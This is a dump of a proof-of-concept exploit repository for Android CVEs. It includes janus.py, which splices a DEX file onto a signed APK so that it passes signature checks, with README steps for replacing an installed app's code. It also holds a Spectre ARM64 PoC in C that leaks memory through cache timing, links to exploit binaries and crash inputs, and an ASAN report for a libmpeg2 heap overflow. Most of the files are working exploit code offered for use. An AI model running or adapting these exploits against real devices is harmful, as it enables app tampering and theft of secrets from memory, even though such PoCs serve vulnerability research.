├── CVE-2017-0474
    └── output.webm
├── CVE-2017-0641
    └── output.webm
├── CVE-2017-13156
    ├── H5.apk
    ├── README.md
    └── janus.py
├── CVE-2017-5753
    ├── README.md
    ├── a.out
    └── source.c
├── CVE-2018-9341
    ├── README.md
    └── poc
└── README.md


/CVE-2017-0474/output.webm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/V-E-O/PoC/5da7d063f2b4070cbeabf7a453317c91e8ac2aba/CVE-2017-0474/output.webm


--------------------------------------------------------------------------------
/CVE-2017-0641/output.webm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/V-E-O/PoC/5da7d063f2b4070cbeabf7a453317c91e8ac2aba/CVE-2017-0641/output.webm


--------------------------------------------------------------------------------
/CVE-2017-13156/H5.apk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/V-E-O/PoC/5da7d063f2b4070cbeabf7a453317c91e8ac2aba/CVE-2017-13156/H5.apk


--------------------------------------------------------------------------------
/CVE-2017-13156/README.md:
--------------------------------------------------------------------------------
 1 | Janus CVE-2017-13156 PoC
 2 | 
 3 | usage: janus.py dex apk out_apk
 4 | 
 5 | Android package installer does NOT check extra data before PKZIP, thus concat DEX+APK together and little bit of fix, installation passed.
 6 | 
 7 | ART can run both APK and DEX, so here DEX ahead of base.apk is actually the one to execute.
 8 | 
 9 |  * extract the original classes.dex
10 |  * use APKTOOL to do stuffs on it
11 |  * fuse the new dex into original APK
12 |  * update the installed app :)
13 | 
14 | This vulnerability was found by GuardSquare https://www.guardsquare.com/en/blog/new-android-vulnerability-allows-attackers-modify-apps-without-affecting-their-signatures
15 | 
16 | FAQ:
17 | 
18 |  * Why my generated apk crashes?
19 | 
20 | You may have seen this in logcat:
21 | 
22 | ```04-24 00:01:47.162  4330  4330 E AndroidRuntime: java.lang.RuntimeException: Unable to get provider jakhar.aseem.diva.NotesProvider: java.lang.ClassNotFoundException: Didn't find class "jakhar.aseem.diva.NotesProvider" on path: DexPathList[[zip file "/data/app/jakhar.aseem.diva-1/base.apk"],nativeLibraryDirectories=[/data/app/jakhar.aseem.diva-1/lib/x86, /data/app/jakhar.aseem.diva-1/base.apk!/lib/x86, /vendor/lib, /system/lib]]
23 | 04-24 00:01:47.162  4330  4330 E AndroidRuntime: Caused by: java.lang.ClassNotFoundException: Didn't find class "jakhar.aseem.diva.NotesProvider" on path: DexPathList[[zip file "/data/app/jakhar.aseem.diva-1/base.apk"],nativeLibraryDirectories=[/data/app/jakhar.aseem.diva-1/lib/x86, /data/app/jakhar.aseem.diva-1/base.apk!/lib/x86, /vendor/lib, /system/lib]]
24 | ```
25 | 
26 | The essential reason is Android still using the original AndroidManifest.xml to parse the app (mainly your new DEX).
27 | 
28 | So it's good idea to setup a new project with the original AndroidManifest.xml, and fix providers, receivers, exported activities. You don't need to write them well, just auto-generate null dummy classes.
29 | 


--------------------------------------------------------------------------------
/CVE-2017-13156/janus.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | import sys
 4 | import struct
 5 | import hashlib
 6 | from zlib import adler32
 7 | 
 8 | def update_checksum(data):
 9 |     m = hashlib.sha1()
10 |     m.update(data[32:])
11 |     data[12:12+20] = m.digest()
12 | 
13 |     v = adler32(buffer(data[12:])) & 0xffffffff
14 |     data[8:12] = struct.pack("<L", v)
15 | 
16 | def main():
17 |     if len(sys.argv) != 4:
18 |         print("usage: %s dex apk out_apk" % __file__)
19 |         return
20 | 
21 |     _, dex, apk, out_apk = sys.argv
22 | 
23 |     with open(dex, 'rb') as f:
24 |         dex_data = bytearray(f.read())
25 |     dex_size = len(dex_data)
26 | 
27 |     with open(apk, 'rb') as f:
28 |         apk_data = bytearray(f.read())
29 |     cd_end_addr = apk_data.rfind('\x50\x4b\x05\x06')
30 |     cd_start_addr = struct.unpack("<L", apk_data[cd_end_addr+16:cd_end_addr+20])[0]
31 |     apk_data[cd_end_addr+16:cd_end_addr+20] = struct.pack("<L", cd_start_addr+dex_size)
32 | 
33 |     pos = cd_start_addr
34 |     while (pos < cd_end_addr):
35 |         offset = struct.unpack("<L", apk_data[pos+42:pos+46])[0]
36 |         apk_data[pos+42:pos+46] = struct.pack("<L", offset+dex_size)
37 |         pos = apk_data.find("\x50\x4b\x01\x02", pos+46, cd_end_addr)
38 |         if pos == -1:
39 |             break
40 | 
41 |     out_data = dex_data + apk_data
42 |     out_data[32:36] = struct.pack("<L", len(out_data))
43 |     update_checksum(out_data)
44 | 
45 |     with open(out_apk, "wb") as f:
46 |         f.write(out_data)
47 | 
48 |     print ('%s generated' % out_apk)
49 | 
50 | 
51 | if __name__ == '__main__':
52 |     main()


--------------------------------------------------------------------------------
/CVE-2017-5753/README.md:
--------------------------------------------------------------------------------
 1 | Spectre CVE-2017-5753 PoC for Android/Linux/ARM64
 2 | 
 3 | Original Spectre PoC code is from appendix in its paper https://spectreattack.com/spectre.pdf
 4 | 
 5 | I've been testing alternative solutions to replace the X86 cache flush and timer instructions, not very stable. 
 6 | 
 7 | Now it become stable, thanks to methods from @lgeek https://github.com/lgeek/spec_poc_arm/blob/master/dump_sys_regs.c
 8 | 
 9 | a.out was compiled with Android NDK Standalone Toolchain:
10 | /tmp/my-android-toolchain/bin/aarch64-linux-android-gcc source.c -pie -std=gnu99
11 | 
12 | or with a standard Debian AArch64 toolchain:
13 | aarch64-linux-gnu-gcc source.c -pie -std=gnu99 -lpthread
14 | 


--------------------------------------------------------------------------------
/CVE-2017-5753/a.out:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/V-E-O/PoC/5da7d063f2b4070cbeabf7a453317c91e8ac2aba/CVE-2017-5753/a.out


--------------------------------------------------------------------------------
/CVE-2017-5753/source.c:
--------------------------------------------------------------------------------
  1 | #include <stdio.h>
  2 | #include <stdlib.h> 
  3 | #include <stdint.h>
  4 | #include <string.h>
  5 | #include <pthread.h>
  6 | 
  7 | /********************************************************************
  8 | Victim code.
  9 | ********************************************************************/
 10 | volatile uint64_t counter = 0;
 11 | uint64_t miss_min = 0;
 12 | unsigned int array1_size = 16;
 13 | uint8_t unused1[64];
 14 | uint8_t array1[160] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 };
 15 | uint8_t unused2[64];
 16 | uint8_t array2[256 * 512];
 17 | char* secret = "The Magic Words are Squeamish Ossifrage.";
 18 | 
 19 | uint8_t temp = 0; /* Used so compiler won't optimize out victim_function() */
 20 | 
 21 | void victim_function(size_t x) {
 22 | 	if (x < array1_size)
 23 | 	{
 24 | 		temp &= array2[array1[x] * 512];
 25 | 	}
 26 | }
 27 | 
 28 | void *inc_counter(void *a) {
 29 | 	while (1) {
 30 | 		counter++;
 31 | 		asm volatile ("DMB SY");
 32 | 	}
 33 | }
 34 | 
 35 | // timing and flush methods copied from https://github.com/lgeek/spec_poc_arm
 36 | static uint64_t timed_read(volatile uint8_t *addr) {
 37 | 	uint64_t ns = counter;
 38 | 
 39 | 	asm volatile (
 40 | 		"DSB SY\n"
 41 | 		"LDR X5, [%[ad]]\n"
 42 | 		"DSB SY\n"
 43 | 		: : [ad] "r" (addr) : "x5");
 44 | 
 45 | 	return counter - ns;
 46 | }
 47 | 
 48 | static inline void flush(void *addr) {
 49 | 	asm volatile ("DC CIVAC, %[ad]" : : [ad] "r" (addr));
 50 | 	asm volatile("DSB SY");
 51 | }
 52 | 
 53 | uint64_t measure_latency() {
 54 | 	uint64_t ns;
 55 | 	uint64_t min = 0xFFFFF;
 56 | 
 57 | 	for (int r = 0; r < 300; r++) {
 58 | 		flush(&array1[0]);
 59 | 		ns = timed_read(&array1[0]);
 60 | 		if (ns < min) min = ns;
 61 | 	}
 62 | 
 63 | 	return min;
 64 | }
 65 | 
 66 | 
 67 | /********************************************************************
 68 | Analysis code
 69 | ********************************************************************/
 70 | 
 71 | /* Report best guess in value[0] and runner-up in value[1] */
 72 | void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) {
 73 | 	static int results[256];
 74 | 	int tries, i, j, k, mix_i;
 75 | 	size_t training_x, x;
 76 | 	register uint64_t time2;
 77 | 
 78 | 	for (i = 0; i < 256; i++)
 79 | 		results[i] = 0;
 80 | 	for (tries = 999; tries > 0; tries--) {
 81 | 
 82 | 		/* Flush array2[256*(0..255)] from cache */
 83 | 		for (i = 0; i < 256; i++)
 84 | 			flush(&array2[i * 512]); /* intrinsic for clflush instruction */
 85 | 
 86 | 		/* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
 87 | 		training_x = tries % array1_size;
 88 | 		for (j = 29; j >= 0; j--) {
 89 | 			flush(&array1_size);
 90 | 			for (volatile int z = 0; z < 100; z++)
 91 | 			{
 92 | 			} /* Delay (can also mfence) */
 93 | 
 94 | 			/* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
 95 | 			/* Avoid jumps in case those tip off the branch predictor */
 96 | 			x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
 97 | 			x = (x | (x >> 16)); /* Set x=-1 if j%6=0, else x=0 */
 98 | 			x = training_x ^ (x & (malicious_x ^ training_x));
 99 | 
100 | 			/* Call the victim! */
101 | 			victim_function(x);
102 | 		}
103 | 
104 | 		/* Time reads. Order is lightly mixed up to prevent stride prediction */
105 | 		for (i = 0; i < 256; i++)
106 | 		{
107 | 			mix_i = ((i * 167) + 13) & 255;
108 | 			time2 = timed_read(&array2[mix_i * 512]);
109 | 			if (time2 <= miss_min && mix_i != array1[tries % array1_size])
110 | 				results[mix_i]++; /* cache hit - add +1 to score for this value */
111 | 		}
112 | 
113 | 		/* Locate highest & second-highest results results tallies in j/k */
114 | 		j = k = -1;
115 | 		for (i = 0; i < 256; i++)
116 | 		{
117 | 			if (j < 0 || results[i] >= results[j])
118 | 			{
119 | 				k = j;
120 | 				j = i;
121 | 			}
122 | 			else if (k < 0 || results[i] >= results[k])
123 | 			{
124 | 				k = i;
125 | 			}
126 | 		}
127 | 		if (j == 0)
128 | 			continue;
129 | 
130 | 		if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
131 | 			break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */
132 | 	}
133 | 	value[0] = (uint8_t)j;
134 | 	score[0] = results[j];
135 | 	value[1] = (uint8_t)k;
136 | 	score[1] = results[k];
137 | }
138 | 
139 | int main(int argc, const char * * argv) {
140 | 	printf("Putting '%s' in memory\n", secret);
141 | 	size_t malicious_x = (size_t)(secret - (char *)array1); /* default for malicious_x */
142 | 	int score[2], len = strlen(secret);
143 | 	uint8_t value[2];
144 | 
145 | 	for (size_t i = 0; i < sizeof(array2); i++)
146 | 		array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
147 | 
148 | 	pthread_t inc_counter_thread;
149 | 	if (pthread_create(&inc_counter_thread, NULL, inc_counter, NULL)) {
150 | 		fprintf(stderr, "Error creating thread\n");
151 | 		return 1;
152 | 	}
153 |     // let the bullets fly a bit ....
154 | 	while (counter < 10000000);
155 | 	asm volatile ("DSB SY");
156 | 
157 | 	miss_min = measure_latency();
158 | 	if (miss_min == 0) {
159 | 		fprintf(stderr, "Unreliable access timing\n");
160 | 		exit(EXIT_FAILURE);
161 | 	}
162 | 	miss_min -= 1;
163 | 	printf("miss_min %d\n", miss_min);
164 | 
165 | 	printf("Reading %d bytes:\n", len);
166 | 	while (--len >= 0)
167 | 	{
168 | 		printf("Reading at malicious_x = %p... ", (void *)malicious_x);
169 | 		readMemoryByte(malicious_x++, value, score);
170 | 		printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear"));
171 | 		printf("0x%02X='%c' score=%d ", value[0],
172 | 			(value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
173 | 		if (score[1] > 0)
174 | 			printf("(second best: 0x%02X='%c' score=%d)", value[1],
175 | 			(value[1] > 31 && value[1] < 127 ? value[1] : '?'),
176 | 				score[1]);
177 | 		printf("\n");
178 | 	}
179 | 	return (0);
180 | }
181 | 
182 | 


--------------------------------------------------------------------------------
/CVE-2018-9341/README.md:
--------------------------------------------------------------------------------
 1 | A Heap Buffer OOB Write critical vulnerability in libmpeg2 https://android.googlesource.com/platform/external/libmpeg2/
 2 | 
 3 | Fixed in June Android security bulletin https://android.googlesource.com/platform/external/libmpeg2/+/69ac35d37c0fcf43ac3dac6c99dbec5ecb258c41
 4 | 
 5 | Just found it in crash corpus junk when packing before leaving, forgot to check it half year ago....
 6 | 
 7 | **Build Prep**
 8 | 
 9 | one already compiled Android source tree
10 | 
11 | mmm external/libmpeg2
12 | 
13 | mmm external/libmpeg2/test
14 | 
15 | mpeg2dec --input poc --output /dev/null --num_frames -1
16 | 
17 | **ASAN report (X86 build)**
18 | 
19 | <pre>
20 | Ittiam Decoder Version number: @(#)Id:MPEG2VDEC_eval Ver:01.00 Released by ITTIAM Build: Jul  3 2018 @ 07:53:17
21 | =================================================================
22 | ==9197==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf53fefa0 at pc 0x081ad034 bp 0xfff5b7c8 sp 0xfff5b7bc
23 | WRITE of size 8 at 0xf53fefa0 thread T0
24 |     #0 0x81ad033 in impeg2_mc_fullx_halfy_8x8_sse42 /home/ipattern/mpeg2/common/x86/impeg2_inter_pred_sse42_intr.c:815:5
25 |     #1 0x8181091 in impeg2d_mc_fullx_halfy /home/ipattern/mpeg2/decoder/impeg2d_mc.c:1122:9
26 |     #2 0x817b739 in impeg2d_motion_comp /home/ipattern/mpeg2/decoder/impeg2d_mc.c:129:5
27 |     #3 0x817b739 in impeg2d_dec_skip_p_mb /home/ipattern/mpeg2/decoder/impeg2d_mc.c:584
28 |     #4 0x817f45f in impeg2d_dec_skip_mbs /home/ipattern/mpeg2/decoder/impeg2d_mc.c:735:9
29 |     #5 0x818b786 in impeg2d_dec_pnb_mb_params /home/ipattern/mpeg2/decoder/impeg2d_pnb_pic.c:351:13
30 |     #6 0x818c9c6 in impeg2d_dec_p_b_slice /home/ipattern/mpeg2/decoder/impeg2d_pnb_pic.c:542:19
31 |     #7 0x8164b4d in impeg2d_dec_slice /home/ipattern/mpeg2/decoder/impeg2d_dec_hdr.c:900:15
32 |     #8 0x81653e7 in impeg2d_dec_pic_data_thread /home/ipattern/mpeg2/decoder/impeg2d_dec_hdr.c:990:23
33 |     #9 0x816a55a in impeg2d_dec_pic_data /home/ipattern/mpeg2/decoder/impeg2d_dec_hdr.c:1432:5
34 |     #10 0x816d97b in impeg2d_process_video_bit_stream /home/ipattern/mpeg2/decoder/impeg2d_dec_hdr.c:1799:17
35 |     #11 0x816e5bd in impeg2d_dec_frm /home/ipattern/mpeg2/decoder/impeg2d_decoder.c:220:19
36 |     #12 0x815aefe in impeg2d_api_entity /home/ipattern/mpeg2/decoder/impeg2d_api_main.c:3488:17
37 |     #13 0x814e823 in impeg2d_api_function /home/ipattern/mpeg2/decoder/impeg2d_api_main.c:1411:25
38 |     #14 0x81b8b3e in main /home/ipattern/mpeg2/test/decoder/main.c:2886:19
39 |     #15 0xf7537636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636)
40 |     #16 0x8061f87 in _start (/home/ipattern/mpeg2/mpeg2_fast+0x8061f87)
41 | 
42 | 0xf53fefa0 is located 160 bytes to the right of 6178560-byte region [0xf4e1a800,0xf53fef00)
43 | allocated by thread T0 here:
44 |     #0 0x81067e4 in __interceptor_aligned_alloc.localalias.0 (/home/ipattern/mpeg2/mpeg2_fast+0x81067e4)
45 |     #1 0x81b585e in app_aligned_malloc /home/ipattern/mpeg2/test/decoder/main.c:456:12
46 |     #2 0x81b585e in main /home/ipattern/mpeg2/test/decoder/main.c:2164
47 |     #3 0xf7537636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636)
48 | 
49 | SUMMARY: AddressSanitizer: heap-buffer-overflow /home/ipattern/mpeg2/common/x86/impeg2_inter_pred_sse42_intr.c:815:5 in impeg2_mc_fullx_halfy_8x8_sse42
50 | Shadow bytes around the buggy address:
51 |   0x3ea7fda0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
52 |   0x3ea7fdb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
53 |   0x3ea7fdc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
54 |   0x3ea7fdd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
55 |   0x3ea7fde0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
56 | =>0x3ea7fdf0: fa fa fa fa[fa]fa fa fa fa fa fa fa fa fa fa fa
57 |   0x3ea7fe00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
58 |   0x3ea7fe10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
59 |   0x3ea7fe20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
60 |   0x3ea7fe30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
61 |   0x3ea7fe40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
62 | Shadow byte legend (one shadow byte represents 8 application bytes):
63 |   Addressable:           00
64 |   Partially addressable: 01 02 03 04 05 06 07 
65 |   Heap left redzone:       fa
66 |   Heap right redzone:      fb
67 |   Freed heap region:       fd
68 |   Stack left redzone:      f1
69 |   Stack mid redzone:       f2
70 |   Stack right redzone:     f3
71 |   Stack partial redzone:   f4
72 |   Stack after return:      f5
73 |   Stack use after scope:   f8
74 |   Global redzone:          f9
75 |   Global init order:       f6
76 |   Poisoned by user:        f7
77 |   Container overflow:      fc
78 |   Array cookie:            ac
79 |   Intra object redzone:    bb
80 |   ASan internal:           fe
81 |   Left alloca redzone:     ca
82 |   Right alloca redzone:    cb
83 | ==9197==ABORTING
84 | </pre>
85 | 


--------------------------------------------------------------------------------
/CVE-2018-9341/poc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/V-E-O/PoC/5da7d063f2b4070cbeabf7a453317c91e8ac2aba/CVE-2018-9341/poc


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # PoC
2 | PoC of CVE/Exploit
3 | 


--------------------------------------------------------------------------------